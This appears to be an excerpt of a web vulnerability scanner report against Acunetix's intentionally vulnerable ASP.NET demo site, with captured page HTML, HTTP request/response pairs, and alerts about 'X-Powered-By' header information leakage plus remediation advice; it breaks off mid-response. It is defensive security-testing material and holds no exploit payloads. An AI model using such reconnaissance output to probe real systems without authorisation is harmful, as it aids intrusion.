<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence X-Powered-By: ASP.NETSolution Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
GET http://testaspnet.vulnweb.com/
Alert tags Alert description The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:15 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence X-Powered-By: ASP.NETSolution Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 